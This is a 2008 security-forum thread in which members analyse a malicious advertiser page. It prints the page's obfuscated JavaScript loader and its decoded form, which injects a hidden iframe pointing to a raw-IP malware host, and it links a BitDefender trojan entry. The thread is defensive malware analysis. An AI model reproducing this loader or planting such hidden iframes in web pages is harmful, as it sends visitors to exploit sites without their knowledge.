Author Topic: perso.orange.fr  (Read 5711 times)

0 Members and 1 Guest are viewing this topic.

May 05, 2008, 01:56:09 am
Read 5711 times

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Code: [Select]
hxxp://perso.orange.fr/lightningbolttraffic/sites/
Checking this advertiser link that is posted above. My browser window shuts down. I'm seeing code in a script tag. LinkScannerPro says the above url has a link to a known exploit site. When trying to copy and paste at our forum we got a virus alert for virus js/psyme.qm and warnings on it interfering with the mysql somehow on the forum.

May 05, 2008, 06:55:39 am
Reply #1

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
the site have javascript obfuscated
Code: [Select]
<script>function v481b6eb925459(v481b6eb925d85){ var v481b6eb926451=16; return(parseInt(v481b6eb925d85,v481b6eb926451));}function v481b6eb926c47(v481b6eb92703e){ function v481b6eb927c33 () {var v481b6eb92802f=2; return v481b6eb92802f;} var v481b6eb92743a='';for(v481b6eb927836=0; v481b6eb927836<v481b6eb92703e.length; v481b6eb927836+=v481b6eb927c33()){ v481b6eb92743a+=(String.fromCharCode(v481b6eb925459(v481b6eb92703e.substr(v481b6eb927836, v481b6eb927c33()))));}return v481b6eb92743a;} document.write(v481b6eb926c47('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6336323561306634207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323339363734292B273430363830313439636538385C272077696474683D343039206865696768743D353836207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<CENTER>

after deobfuscated on have another script

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=c625a0f4 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*239674)+'40680149ce88\' width=409 height=586 style=\'display: none\'></iframe>')</SCRIPT>
point to russian site , but if i load direct this page link i receive only

Code: [Select]
Forbidden

You don't have permission to access /.if/go.html on this server.


MAybe need call the site at 
Code: [Select]
src=\'http://77.221.133.150/.if/go.html  whit different referer  or from other page.

Edgar   ;D

May 05, 2008, 10:08:38 pm
Reply #2

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Thank you Edgar. I just checked out your blog, nice.

May 06, 2008, 03:27:36 am
Reply #3

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
Today rusiian site working  OK and i find hidden iframe with other javascript in page if.go

I think is the same described on  bit defender site at

http://www.bitdefender.com/VIRUS-1000262-en--Trojan.Clicker.HTML.IFrame.AR.html

Edgar  ;D